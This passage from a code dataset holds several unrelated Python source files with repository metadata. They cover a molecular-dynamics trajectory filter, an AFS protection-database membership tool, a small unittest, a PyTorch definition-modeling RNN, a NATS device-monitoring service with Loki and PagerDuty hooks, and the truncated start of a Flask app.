['delta','filename','fixed','n_frames',\n 'n_atoms','periodic','remarks',\n 'skip','skip_timestep','start_timestep']:\n self.dcd_attributes[k] = self.traj.__dict__[k]\n self.trajectory = ThinDCDReader(self)\n self.n_frames = self.dcd_attributes['n_frames']\n elif not (dcd is None or psf is None) or filename is not None:\n # read from dcd\n try:\n self.traj,self.tgroup\n except AttributeError:\n self.traj,self.tgroup = [None] * 2\n if filename is not None:\n psf = self.filename(filename,'psf')\n dcd = self.filename(filename,'dcd')\n u = MDAnalysis.Universe(psf,dcd)\n group = u.select_atoms('type *') # TODO: why do I need this?\n self.group = group # group that refers to hopping trajectory\n self.TAPtraj = u.trajectory # DCD trajectory object\n self.ts = self.TAPtraj.ts\n self.n_frames = self.TAPtraj.n_frames\n self.totaltime = self.TAPtraj.totaltime\n # DCD object that can be slotted into another universe\n self.trajectory = u.trajectory\n else:\n raise ValueError('Not sufficient data to create a TAP trajectory.')\n\n filename = utilities.filename_function\n\n def next(self):\n \"\"\"Provides the next time step of a TAP trajectory.\n\n ts = next()\n\n If a TAP trajectory file exists then this is used. Otherwise,\n the coordinate trajectory is mapped on the fly (which is\n computationally more expensive).\n \"\"\"\n if self.TAPtraj:\n nextTS = self._read_next_timestep\n else:\n nextTS = self._map_next_timestep\n return nextTS()\n\n def rewind(self):\n if self.TAPtraj:\n self.TAPtraj.rewind()\n else:\n self.traj.rewind()\n\n def _map_next_timestep(self):\n \"\"\"Read next timestep from coordinate trajectory and set up the\n TAP trajectory time step\n \"\"\"\n return self._coord2TAP(self.traj.next())\n\n def _read_next_timestep(self):\n \"\"\"Read next time step from a TAP trajectory on disk\"\"\"\n return self.TAPtraj.next()\n\n def write(self,filename,start=None,step=None,delta=None,load=True):\n \"\"\"Write hopping trajectory as standard dcd file.\n\n write('TAP')\n\n :Arguments:\n\n load = True Immediately loads the trajectory so that further\n calls to next() will use the computed\n trajectory and don't use expensive mapping.\n\n Ignore the other options and leave them at the defaults. Currently,\n only the whole trajectory is written. 
All atoms in the original\n trajectory are written to the output so you should be able to use your\n original psf file.\n\n NOTE: Fixed atoms are possibly not accounted for properly.\n\n Note that it is your responsibility to load the TAP trajectory and the\n appropriate psf together as there is very limited information stored in\n the dcd itself.\n \"\"\"\n set_verbosity(self.verbosity) # this is stupid\n\n psfname = self.filename(filename,'psf')\n dcdname = self.filename(filename,'dcd')\n\n # see MDAnalysis/src/dcd/dcd.c for explanations\n if start is None:\n start = self.traj.start_timestep # starting time step for DCD file\n if step is None:\n step = self.traj.skip_timestep # NSAVC (# ts between written DCD frames)\n if delta is None:\n delta = self.traj.delta # length of ts (AKMA units)\n\n dcdwriter = MDAnalysis.DCD.DCDWriter(dcdname,self.ts.n_atoms,\n start,step,delta,\n remarks='TAP trajectory')\n pm = ProgressMeter(self.n_frames, interval=10,\n format=\"Mapping TAP frame %(step)5d/%(numsteps)6d [%(percentage)5.1f%%]\\r\")\n for ts in self.map_dcd():\n dcdwriter.write_next_timestep(ts)\n pm.echo(ts.frame)\n dcdwriter.close()\n logger.info(\"TAPTrajectory.write(): wrote TAP traj %r.\", dcdname)\n\n if load is True:\n self.TAPtraj = MDAnalysis.DCD.DCDReader(dcdname)\n self.trajectory = self.TAPtraj\n\n def map_dcd(self,start=None,stop=None,skip=1):\n \"\"\"Generator to read the trajectory from start to stop and map\n positions to TAP sites.\n\n ts = map_dcd(**kwargs)\n\n Arguments:\n start starting frame number (None means first)\n stop last frame to read (exclusive) (None means last)\n (Those are arguments to dcd[start:stop].)\n Iterator Returns:\n ts hopping trajectory timestep object (iterator)\n \"\"\"\n # note: iterator + loop is slower than direct loop so I may\n # implement other functions directly with loops and leave the\n # iterator for the user\n if start is not None or stop is not None:\n raise NotImplementedError('start/stop do not work on big trajectories')\n if start is None:\n start = 0\n if stop is None:\n stop = self.n_frames\n\n #for traj_ts in self.traj[start:stop]:\n for traj_ts in self.traj: # no slicing for big trajectories (ERRORS!)\n yield self._coord2TAP(traj_ts)\n\n def _coord2TAP(self,ts):\n \"\"\"Translate a single trajectory coordinate frame into a TAP\n trajectory frame and update the TAP trajectory frame.\n\n ts MDAnalysis.trajectory.ts time step object\n\n Only the selection's coordinates are TAP-filtered.\n :Returns:\n\n hopping ts\n \"\"\"\n # Modify the original frame in place and use it as the new frame. This\n # should work in most instances unless one wants to immediately compare old\n # and new frame.\n self.ts = ts # update the TAP time step\n\n # only work on the selected coordinates (memory efficiency but\n # slower??) 
(I didn't manage to always work on a reference to the\n # coords; this would avoid having to patch back the altered coordinates\n # into the whole coord set, see below.)\n coords = self.tgroup.positions # makes a new copy\n self.__lastframes.append(coords.copy()) # remember last TAPsteps frames\n\n # calculate RMS distance for last TAPsteps from current TAP for all coords\n # (current coords are part of the running average over __lastframes)\n # __currentTAP is initialized in __init__ to the first frame\n d = numpy.average(\n numpy.sqrt(\n numpy.sum((numpy.asarray(self.__lastframes) - self.__currentTAP)**2, axis=0)),\n axis=1)\n onTAP = (d <= self.TAPradius) # particles that did not move far\n coords[onTAP] = self.__currentTAP[onTAP] # reset to TAP\n self.__currentTAP[:] = coords # remember TAP for next frame\n # patch selected coordinates back into full coordinate set\n # u.trajectory.ts._pos[w.indices()] = new_coord_array # WORKS (no copy)\n # x = u.trajectory.ts._pos[w.indices()] # FAILS (copy involved)\n # x[:] = new_coord_array[:] #\n self.ts._pos[self.tgroup_indices] = self.__currentTAP\n return self.ts\n\n def iterator(self):\n return self.__iter__()\n\n def __iter__(self):\n if self.TAPtraj:\n for ts in self.TAPtraj:\n yield ts\n else:\n for traj_ts in self.traj:\n yield self._coord2TAP(traj_ts)\n\n\n\n\n\n# move to MDAnalysis & make it work with 0.6.2\nclass ThinDCDReader(MDAnalysis.coordinates.DCD.DCDReader):\n \"\"\"DCD-like object that supports a subsection of the DCDReader\n interface such as iteration over frames and most attributes. The\n important part is that the __iter__() method is overridden to\n provide data from another source. This allows a filter architecture\n for trajectories.\"\"\"\n # Right now specifically designed for TAPtrajectory class.\n def __init__(self,datafeeder):\n D = datafeeder\n # should have as attributes:\n # ['dcdfilename','delta','filename','fixed','n_frames', 'numatoms','periodic',\n # 'remarks', 'skip','skip_timestep','start_timestep']\n self.__dict__.update(D.dcd_attributes)\n self.dcdfile = None # no file is linked; with None, __del__ will be happy\n # use the classes/methods from the feeder class:\n self.ts = D.ts\n self.__iter__ = D.__iter__\n self.next = D.next # feeder needs next()\n self.rewind = D.rewind\n def __getitem__(self,frame):\n \"\"\"Slow sequential 'read forward' implementation.\"\"\"\n for ts in self:\n if ts.frame == frame+1: # frames are 1-based\n break\n return ts\n def timeseries(self,*args,**kwargs):\n raise NotImplementedError\n def correl(self,*args,**kwargs):\n raise NotImplementedError\n def close_trajectory(self):\n pass\n\n\n","repo_name":"Becksteinlab/hop","sub_path":"hop/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":35440,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"40193130413","text":"#\n# AFS Server management toolkit: Find ownership of entry\n# -*- coding: utf-8 -*-\n#\n\n__copyright__ = \"\"\"\nCopyright (C) 2014 Red Hat, Inc. All Rights Reserved.\nWritten by David Howells (dhowells@redhat.com)\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public Licence version 2 as\npublished by the Free Software Foundation.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\nGNU General Public Licence for more details.\n\nYou should have received a copy of the GNU General Public Licence\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\"\"\"\n\nfrom afs.argparse import *\nfrom afs.lib.output import *\nimport kafs\nimport sys\n\nhelp = \"Show the Protection Database groups owned by a user or group\"\n\ncommand_arguments = [\n [ \"nameorid\", get_strings, \"rm\", \"+\" ],\n [ \"supergroups\", get_dummy, \"fn\" ],\n [ \"expandgroups\", get_dummy, \"fn\" ],\n [ \"cell\", get_cell, \"os\", \"\" ],\n [ \"noauth\", get_auth, \"fn\" ],\n [ \"localauth\", get_auth, \"fn\" ],\n [ \"verbose\", get_verbose, \"fn\" ],\n [ \"encrypt\", get_dummy, \"fn\" ],\n [ \"force\", get_dummy, \"fn\" ],\n]\n\ncant_combine_arguments = [\n ( \"cell\", \"localauth\" ),\n ( \"noauth\", \"localauth\" ),\n]\n\nargument_size_limits = {\n \"nameorid\" : kafs.PR_MAXNAMELEN,\n}\n\ndescription = r\"\"\"\nShow the Protection Database groups owned by a user or group\n\"\"\"\n\ndef main(params):\n cell = params[\"cell\"]\n prcache = cell.get_prcache(params)\n\n for name in params[\"nameorid\"]:\n prcache.precache_name_or_id(name)\n\n requests = []\n memberships = dict()\n\n for name in params[\"nameorid\"]:\n gid = prcache.name_or_id_to_id(name)\n if gid == None:\n error(\"User or group doesn't exist so couldn't look up id for \" + name + \"\\n\")\n if \"force\" not in params:\n break\n continue\n\n if gid not in requests:\n try:\n if gid < 0:\n # Group\n verbose(\"Listing membership of \", gid, \" (\", name, \")\\n\")\n group = prcache.id_to_group(gid)\n prcache.precache_ids(group)\n else:\n # User - ListElements returns the ancestry of a non-group\n ret = cell.call_pt_server(params, kafs.PR_ListElements, gid)\n elist = ret.elist\n memberships[gid] = elist\n prcache.precache_ids(elist)\n for i in elist:\n if i < 0:\n prcache.id_to_group(i)\n requests.append(gid)\n\n except kafs.AbortPRNOENT:\n error(\"User or group doesn't exist \", name, \" (id \", gid, \")\\n\")\n prcache.id_is_unknown(gid)\n if \"force\" not in params:\n break\n except kafs.AbortPRPERM:\n error(\"Permission denied on ID \", name, \" (id: \", gid, \")\\n\")\n prcache.id_is_unknown(gid)\n if \"force\" not in params:\n break\n\n if \"expandgroups\" in params:\n groups_needing_expansion = set(prcache.known_groups())\n verbose(\"Expand groups \", groups_needing_expansion, \"\\n\")\n while groups_needing_expansion:\n gid = groups_needing_expansion.pop()\n members = prcache.id_to_group(gid)\n for m in members:\n prcache.precache_id(m)\n if m < 0 and not prcache.have_group(m) and m not in groups_needing_expansion:\n groups_needing_expansion.add(m)\n\n if \"supergroups\" in params:\n for r in requests:\n if r < 0:\n ret = cell.call_pt_server(params, kafs.PR_ListGroupsMemberOf, r)\n glist = ret.glist\n memberships[r] = glist\n\n for r in requests:\n # Display members of a group\n if r < 0:\n if \"expandgroups\" in params:\n output(\"Expanded Members of \", prcache.id_to_name(r), \" (id: \", r, \") are:\\n\")\n for m in prcache.id_to_expanded_group(r):\n if m > 0:\n output(\" \", prcache.id_to_name(m), \"\\n\")\n else:\n output(\"Members of \", prcache.id_to_name(r), \" (id: \", r, \") are:\\n\")\n for m in prcache.id_to_group(r):\n output(\" \", prcache.id_to_name(m), \"\\n\")\n\n # Display membership of a user or a group\n if r > 0 and \"expandgroups\" in params:\n output(\"Expanded Groups \", prcache.id_to_name(r), \" (id: \", r, \") is a 
member of:\\n\")\n member_of = memberships[r]\n expanded = set(member_of)\n for gid in member_of:\n expanded |= prcache.id_to_expanded_group(gid)\n for m in expanded:\n if m < 0:\n output(\" \", prcache.id_to_name(m), \"\\n\")\n elif r > 0 or \"supergroups\" in params:\n output(\"Groups \", prcache.id_to_name(r), \" (id: \", r, \") is a member of:\\n\")\n for gid in memberships[r]:\n output(\" \", prcache.id_to_name(gid), \"\\n\")\n","repo_name":"whm/kafs-utils","sub_path":"suite/commands/pts/membership.py","file_name":"membership.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2704913808","text":"import unittest\nimport json\n\nfrom motherbrain.models.operations import MBPipe\n\n\nclass TestMBPipe(unittest.TestCase):\n def setUp(self):\n self.data = {'first_name': 'Walter',\n 'last_name': 'Bishop'}\n\n display_name = lambda x: ','.join([x.get('last_name'),\n x.get('first_name')])\n\n uppercase_str = lambda x: {k:v.upper() for k,v in x.iteritems()\n if isinstance(v, str)}\n add_initials = lambda x: '{}, {}{}'.format(x,\n x[0],\n x.split(',')[1][0])\n\n self.display_name = display_name\n self.add_initials = add_initials\n self.uppercase_str = uppercase_str\n\n def testSingleFun(self):\n \"\"\"Testing Pipe with single function\"\"\"\n pipe = MBPipe(self.data, self.display_name)\n\n self.assertEqual('Bishop,Walter', pipe())\n\n def testMultiFun(self):\n \"\"\"Testing Pipe with multiple function\"\"\"\n pipe = MBPipe(self.data, self.uppercase_str,\n self.display_name,\n self.add_initials)\n\n self.assertEqual('BISHOP,WALTER, BW', pipe())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"urlist/urlist","sub_path":"motherbrain/tests/pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"19"} +{"seq_id":"30259931333","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:haiton\n# datetime:18-9-11 下午11:30\nimport torch\nfrom torch import nn\nfrom model.layers import CharCNN, Hypernym, Hidden, Gated\nfrom regularize.embed_dropout import embedded_dropout\nfrom regularize.locked_dropout import LockedDropout\nfrom regularize.weight_dropout import WeightDrop\nimport numpy as np\nimport pickle\n\n\nclass RNNModel(nn.Module):\n def __init__(self, params):\n super(RNNModel, self).__init__()\n\n self.params = params\n self.rnn_type = self.params[\"rnn_type\"]\n self.n_layers = self.params[\"nlayers\"]\n self.hi_dim = self.params[\"hidim\"]\n self.embedding_dim = self.params[\"emdim\"]\n self.use_input = self.params[\"use_input\"]\n self.use_hidden = self.params[\"use_hidden\"]\n self.use_gated = self.params[\"use_gated\"]\n self.use_ch = self.params[\"use_ch\"]\n self.use_he = self.params[\"use_he\"]\n self.is_conditioned = self.use_input\n self.is_conditioned += self.use_hidden\n self.is_conditioned += self.use_gated\n self.device = torch.device('cuda' if self.params[\"cuda\"] else 'cpu')\n\n assert self.use_input + self.use_hidden + \\\n self.use_gated <= 1, \"Too many conditionings used\"\n\n self.drop = nn.Dropout(self.params[\"dropout\"])\n self.lockdrop = LockedDropout()\n self.hdrop = nn.Dropout(self.params[\"dropouth\"])\n self.idrop = nn.Dropout(self.params[\"dropouti\"])\n self.edrop = nn.Dropout(self.params[\"dropoute\"])\n self.dropout = self.params[\"dropout\"]\n self.dropouti = self.params[\"dropouti\"]\n self.dropouth = self.params[\"dropouth\"]\n 
self.dropoute = self.params[\"dropoute\"]\n\n self.embedding = nn.Embedding(self.params[\"vocab_size\"], self.embedding_dim)\n if self.params[\"w2v_weights\"]:\n with open(self.params[\"w2v_weights\"], 'rb') as infile:\n pretrain_emb = pickle.load(infile)\n infile.close()\n self.embedding.weight.data.copy_(\n torch.from_numpy(pretrain_emb)\n )\n else:\n self.embedding.weight.data.copy_(\n torch.from_numpy(\n self.random_embedding(self.params[\"vocab_size\"], self.embedding_dim)\n )\n )\n self.embedding.weight.requires_grad = not self.params[\"fix_embeddings\"]\n\n self.ch_dim = 0\n self.he_dim = 0\n # ch\n if self.use_ch:\n self.ch = CharCNN(\n n_ch_tokens=self.params[\"n_ch_tokens\"],\n ch_maxlen=self.params[\"ch_maxlen\"],\n ch_emb_size=self.params[\"ch_emb_size\"],\n ch_feature_maps=self.params[\"ch_feature_maps\"],\n ch_kernel_sizes=self.params[\"ch_kernel_sizes\"]\n )\n self.ch_dim = sum(self.params[\"ch_feature_maps\"])\n # he\n if self.use_he:\n self.he_dim = self.embedding_dim\n self.he = Hypernym(self.embedding_dim, self.embedding, self.device)\n concat_embedding_dim = self.embedding_dim + self.ch_dim + self.he_dim\n self.word2hidden = nn.Linear(concat_embedding_dim, self.hi_dim)\n if self.use_input:\n self.embedding_dim = self.embedding_dim + concat_embedding_dim\n if self.use_hidden:\n self.hidden = Hidden(\n in_size=concat_embedding_dim + self.hi_dim,\n out_size=self.hi_dim\n )\n if self.params[\"use_gated\"]:\n self.gated = Gated(\n cond_size=concat_embedding_dim,\n hidden_size=self.hi_dim\n )\n if self.rnn_type in ['LSTM', 'GRU']:\n self.rnn = getattr(nn, self.rnn_type)(self.embedding_dim, self.hi_dim, self.n_layers, dropout=0)\n else:\n try:\n nonlinearity = {'RNN_TANH': 'tanh', 'RNN_RELU': 'relu'}[self.rnn_type]\n except KeyError:\n raise ValueError(\"\"\"An invalid option for `--model` was supplied,\n options are ['LSTM', 'GRU', 'RNN_TANH' or 'RNN_RELU']\"\"\")\n self.rnn = nn.RNN(self.embedding_dim, self.hi_dim, self.n_layers, nonlinearity=nonlinearity, dropout=0)\n if self.params[\"wdrop\"] != 0:\n self.rnn = WeightDrop(self.rnn, ['weight_hh_l0'], dropout=self.params[\"wdrop\"])\n self.decoder = nn.Linear(self.hi_dim, self.params[\"vocab_size\"])\n if self.params[\"tied\"]:\n if self.hi_dim != self.embedding_dim:\n raise ValueError('When using the tied flag, nhid must be equal to emsize')\n self.decoder.weight = self.embedding.weight\n self.init_weights()\n\n def forward(self, inputs, init_hidden, return_h=False):\n word = inputs['word']\n seq = inputs['seq']\n if self.use_input:\n input_vectors = inputs[\"input_vectors\"]\n if self.use_ch:\n chars = inputs['chars']\n if self.use_he:\n hynm = inputs['hypm']\n hynm_weights = inputs['hypm_weights']\n batch_size = word.size(0)\n\n word_emb = embedded_dropout(self.embedding, word, dropout=self.dropoute if self.training else 0)\n seq_emb = embedded_dropout(self.embedding, seq, dropout=self.dropoute if self.training else 0)\n seq_emb = self.lockdrop(seq_emb, self.dropouti)\n if self.use_ch:\n char_embeddings = self.ch(chars)\n word_emb = torch.cat(\n [word_emb, char_embeddings], dim=-1)\n if self.use_he:\n hynm_embeddings = self.he([hynm, hynm_weights])\n word_emb = torch.cat(\n [word_emb, hynm_embeddings], dim=-1)\n if init_hidden is not None:\n hidden = init_hidden\n else:\n hidden = self.init_hidden(word_emb, batch_size, self.n_layers, self.hi_dim)\n raw_outputs = []\n lock_outputs = []\n outputs = []\n for time_step in range(seq.size(0)):\n if time_step != 0:\n raw_outputs = []\n lock_outputs = []\n inp_seq = 
seq_emb[time_step, :, :].view(1, batch_size, -1)\n if self.use_input:\n inp_seq = torch.cat([torch.unsqueeze(word_emb, 0), inp_seq], dim=-1)\n outs, hidden = self.rnn(inp_seq, hidden)\n raw_outputs.append(outs)\n outs = self.lockdrop(outs, self.dropout)\n lock_outputs.append(outs)\n else:\n outs, hidden = self.rnn(inp_seq, hidden)\n raw_outputs.append(outs)\n outs = self.lockdrop(outs, self.dropout)\n lock_outputs.append(outs)\n if self.use_hidden:\n hidden = self.hidden(self.rnn_type, self.n_layers, word_emb, hidden)\n if self.use_gated:\n hidden = self.gated(self.rnn_type, self.n_layers, word_emb, hidden)\n if time_step == 0:\n rnn_hs = raw_outputs\n dropped_rnn_hs = lock_outputs\n else:\n for i in range(len(rnn_hs)):\n rnn_hs[i] = torch.cat((rnn_hs[i], raw_outputs[i]), 0)\n dropped_rnn_hs[i] = torch.cat((dropped_rnn_hs[i], lock_outputs[i]), 0)\n outputs.append(outs)\n outputs = torch.cat(outputs, dim=0)\n outputs = outputs.view(outputs.size(0) * outputs.size(1), outputs.size(2))\n decoded = self.decoder(self.drop(outputs))\n if return_h:\n return decoded, hidden, rnn_hs, dropped_rnn_hs\n return decoded, hidden\n\n def init_weights(self):\n for name, param in self.rnn.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n nn.init.constant_(self.word2hidden.bias, 0.0)\n nn.init.xavier_normal_(self.word2hidden.weight)\n # maybe not use init decoder?\n nn.init.constant_(self.decoder.bias, 0.0)\n nn.init.xavier_normal_(self.decoder.weight)\n if self.use_hidden:\n self.hidden.init_hidden()\n if self.use_gated:\n self.gated.init_gated()\n if self.use_ch:\n self.ch.init_ch()\n\n def random_embedding(self, vocab_size, embedding_dim):\n pretrain_emb = np.empty([vocab_size, embedding_dim])\n scale = np.sqrt(3.0 / embedding_dim)\n for i in range(vocab_size):\n pretrain_emb[i, :] = np.random.uniform(-scale, scale, [1, embedding_dim])\n return pretrain_emb\n\n def init_hidden(self, v, batch_size, num_layers, hidden_dim):\n hidden = self.word2hidden(v).view(-1, batch_size, hidden_dim)\n hidden = hidden.expand(num_layers, batch_size, hidden_dim).contiguous()\n if self.rnn_type == 'LSTM':\n ###############################################h,c fan\n h_c = hidden\n h_h = torch.zeros_like(h_c)\n hidden = (h_h, h_c)\n return hidden\n","repo_name":"Haitons/definition-modeling-pytorch","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74243785642","text":"import argparse\nimport asyncio\nimport json\nimport logging\nimport os.path\nimport random\nimport time\n\nfrom inu import Inu, InuHandler, Status\nfrom inu import const\nfrom inu.const import Priority\nfrom inu.schema import Alert, Log, Heartbeat\nfrom micro_nats import error as mn_error, model\nfrom micro_nats.jetstream.error import ErrorResponseException\nfrom micro_nats.jetstream.protocol.consumer import Consumer, ConsumerConfig\nfrom micro_nats.util import Time\nfrom sentry import logger as sentry_logger, alerter as sentry_alerter\n\n\nclass Device:\n def __init__(self, device_id: str, hb_freq: int):\n self.device_id = device_id\n self.heartbeat_freq = hb_freq\n self.last_heartbeat = time.monotonic()\n\n def has_expired(self, missed=5) -> bool:\n \"\"\"\n Check if the device is considered offline (heartbeat expired).\n \"\"\"\n if self.last_heartbeat is None:\n return False\n\n return (time.monotonic() - self.last_heartbeat) > 
(self.heartbeat_freq * missed)\n\n def beat(self):\n \"\"\"\n Received a heartbeat from this device.\n \"\"\"\n self.last_heartbeat = time.monotonic()\n\n\nclass Sentry(InuHandler):\n MISSED_HEARTBEATS_ALARM = 5\n DEFAULT_PRIORITY = 3\n\n def __init__(self, args: argparse.Namespace):\n self.sentry_logger: sentry_logger.Logger | None = None\n self.sentry_alerter: sentry_alerter.Alerter | None = None\n self.config = {}\n\n self.logger = logging.getLogger('inu.sentry')\n self.load_config(args.config)\n\n self.inu = Inu(const.Context(\n device_id=[\"sentry\", f\"i{random.randint(1000, 9999)}\"],\n nats_server=self.get_config(\"nats\", \"nats://127.0.0.1:4222\"),\n ), self)\n\n self.device_pool = {}\n self.consumers = [\n (const.Streams.HEARTBEAT, const.Subjects.HEARTBEAT, self.on_hb),\n (const.Streams.ALERTS, const.Subjects.ALERT, self.on_alert),\n (const.Streams.SETTINGS, const.Subjects.SETTINGS, self.on_settings),\n (const.Streams.COMMAND, const.Subjects.COMMAND, self.on_command),\n (const.Streams.LOGS, const.Subjects.LOG, self.on_log),\n (const.Streams.STATUS, const.Subjects.STATUS, self.on_status),\n ]\n\n def load_config(self, fn):\n \"\"\"\n Load the settings.json file. Should only ever be called once.\n \"\"\"\n if not os.path.exists(fn):\n raise FileNotFoundError(f\"Config file not found at: {fn}\")\n\n with open(fn) as fp:\n self.config = json.load(fp)\n\n # Create a log engine from config\n log_engine = self.get_config([\"logger\", \"engine\"])\n if log_engine == \"loki\":\n self.sentry_logger = sentry_logger.LokiLogger(self.get_config(\"logger\"))\n else:\n self.logger.warning(\"No known logger configured\")\n\n # Create an alert engine from config\n alert_engine = self.get_config([\"alerter\", \"engine\"])\n if alert_engine == \"pagerduty\":\n self.sentry_alerter = sentry_alerter.PagerDuty(self.get_config(\"alerter\"))\n else:\n self.logger.warning(\"No known alerter configured\")\n\n def get_config(self, key: str | list, default=None):\n \"\"\"\n Get a setting from the local config, or return the default.\n \"\"\"\n if isinstance(key, list):\n path = self.config\n for subkey in key:\n if subkey not in path:\n return default\n path = path[subkey]\n return path\n\n if key in self.config:\n return self.config[key]\n else:\n return default\n\n async def run(self):\n # Init Inu\n if not await self.inu.init():\n return\n\n try:\n while True:\n await self.check_heartbeats()\n await asyncio.sleep(0.1)\n except asyncio.exceptions.CancelledError:\n pass\n\n async def check_heartbeats(self):\n \"\"\"\n Iterates each known device and checks if their heartbeat has expired.\n\n If it has, it will raise an alert and remove the device from the pool.\n \"\"\"\n del_list = []\n for device_id, device in self.device_pool.items():\n if device.has_expired(self.MISSED_HEARTBEATS_ALARM):\n alert = f\"Device <{device_id}> died\"\n await self.inu.alert(alert, await self.get_device_priority(device_id))\n del_list.append(device_id)\n\n for device_id in del_list:\n del self.device_pool[device_id]\n\n async def on_connect(self, server: model.ServerInfo):\n self.logger.info(\"Connected to NATS server\")\n ack_wait = Time.sec_to_nano(1.5)\n\n try:\n for stream_name, subj, cb in self.consumers:\n self.logger.debug(f\"Subscribing to '{stream_name}'\")\n await self.inu.js.consumer.create(\n Consumer(stream_name, ConsumerConfig(\n filter_subject=const.Subjects.all(subj),\n deliver_policy=ConsumerConfig.DeliverPolicy.NEW,\n ack_wait=ack_wait,\n )), cb,\n )\n\n except mn_error.NotFoundError:\n 
self.logger.error(\"Stream not found. Ensure NATS environment is bootstrapped.\")\n return\n\n except ErrorResponseException as e:\n err = e.err_response\n self.logger.error(f\"NATS: {err.code}-{err.err_code}: {err.description}\")\n\n except Exception as e:\n self.logger.error(f\"Subscribe error: {type(e).__name__}: {e}\")\n return\n\n async def publish_log(self, stream: str, ts: int, msg: str, labels: dict):\n \"\"\"\n Send a log directly to the logging engine.\n \"\"\"\n if self.sentry_logger is None:\n return\n\n await self.sentry_logger.publish(stream=stream, ts=ts, msg=msg, labels=labels)\n\n async def on_log(self, msg: model.Message):\n \"\"\"\n Generic log line - send to the logging system (eg Loki).\n \"\"\"\n await self.inu.js.msg.ack(msg)\n device_id = msg.get_subject()[len(const.Subjects.LOG) + 1:]\n log = Log(msg.get_payload())\n await self.publish_log(\n const.Streams.LOGS,\n msg.time_ns,\n json.dumps({\n \"device_id\": device_id,\n \"log_level\": log.level,\n \"message\": log.message,\n }),\n {\n \"device_id\": device_id,\n \"log_level\": log.level,\n }\n )\n\n async def on_alert(self, msg: model.Message):\n \"\"\"\n Alert - this needs to go to paging tool (eg Pagerduty) and log engine.\n \"\"\"\n await self.inu.js.msg.ack(msg)\n device_id = msg.get_subject()[len(const.Subjects.ALERT) + 1:]\n alert = Alert(msg.get_payload())\n\n # Send to logger\n await self.publish_log(\n const.Streams.ALERTS,\n msg.time_ns,\n json.dumps({\n \"device_id\": device_id,\n \"priority\": f\"P{alert.priority}\",\n \"message\": alert.message,\n }),\n {\n \"device_id\": device_id,\n \"priority\": str(alert.priority),\n }\n )\n\n # Send to alerter\n if self.sentry_alerter is not None and alert.priority < Priority.LOWEST:\n await self.sentry_alerter.publish(device_id, alert.message, alert.priority)\n\n async def get_device_priority(self, device_id: str) -> int:\n \"\"\"\n Looks up a device to determine its device priority. Will use a default if settings now found or missing.\n \"\"\"\n try:\n dvc_settings = await self.inu.js.msg.get_last(\n const.Streams.SETTINGS,\n const.Subjects.fqs(const.Subjects.SETTINGS, device_id)\n )\n\n p = int(dvc_settings.from_json()['device_priority'])\n return min(const.Priority.LOWEST, max(const.Priority.HIGHEST, p))\n except mn_error.NotFoundError:\n return self.DEFAULT_PRIORITY\n except Exception as e:\n self.logger.error(f\"Error getting device priority - {type(e)}: {e}\")\n return self.DEFAULT_PRIORITY\n\n async def on_hb(self, msg: model.Message):\n \"\"\"\n Heartbeat from a device. Used to track when a device goes offline.\n \"\"\"\n await self.inu.js.msg.ack(msg)\n device_id = msg.get_subject()[len(const.Subjects.HEARTBEAT) + 1:]\n hb = Heartbeat(msg.get_payload())\n\n if device_id in self.device_pool:\n self.device_pool[device_id].beat()\n else:\n dvc = Device(device_id, hb_freq=hb.interval)\n self.device_pool[device_id] = dvc\n await self.inu.log(f\"Device <{device_id}> now online\")\n\n async def on_settings(self, msg: model.Message):\n \"\"\"\n New settings have been published. Send to logging tool.\n \"\"\"\n device_id = msg.get_subject()[len(const.Subjects.SETTINGS) + 1:]\n await self.publish_log(\n const.Streams.SETTINGS,\n msg.time_ns,\n json.dumps({\n \"device_id\": device_id,\n \"settings\": msg.from_json(),\n }),\n {\n \"device_id\": device_id,\n }\n )\n\n async def on_command(self, msg: model.Message):\n \"\"\"\n Command (eg trigger). 
Send to logging tool.\n        \"\"\"\n        await self.inu.js.msg.ack(msg)\n        subj = msg.get_subject()[len(const.Subjects.COMMAND) + 1:].split(\".\", 1)\n        cmd = subj[0]\n        device_id = subj[1]\n        await self.publish_log(\n            const.Streams.COMMAND,\n            msg.time_ns,\n            json.dumps({\n                \"device_id\": device_id,\n                \"command\": cmd,\n                \"payload\": msg.from_json(),\n            }),\n            {\n                \"device_id\": device_id,\n                \"command\": cmd,\n            }\n        )\n\n    async def on_status(self, msg: model.Message):\n        \"\"\"\n        Device changed state.\n        \"\"\"\n        await self.inu.js.msg.ack(msg)\n        device_id = msg.get_subject()[len(const.Subjects.STATUS) + 1:]\n        status = Status(msg.get_payload())\n        await self.publish_log(\n            const.Streams.STATUS,\n            msg.time_ns,\n            json.dumps({\n                \"device_id\": device_id,\n                \"enabled\": status.enabled,\n                \"locked\": status.locked,\n                \"active\": status.active,\n                \"status\": status.status,\n            }),\n            {\n                \"device_id\": device_id,\n                \"status_enabled\": str(status.enabled),\n                \"status_locked\": str(status.locked),\n                \"status_active\": str(status.active),\n            }\n        )\n","repo_name":"jordonsc/inu-py","sub_path":"src/sentry/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}{"seq_id":"47777442673","text":"from flask import Flask, render_template, redirect\nfrom flask_pymongo import MongoClient\nimport pymongo\nfrom scrape_mars import scrape\nimport os\n\napp = Flask(__name__)\n\nclient= pymongo.MongoClient('mongodb://localhost:27017/')\ndb = 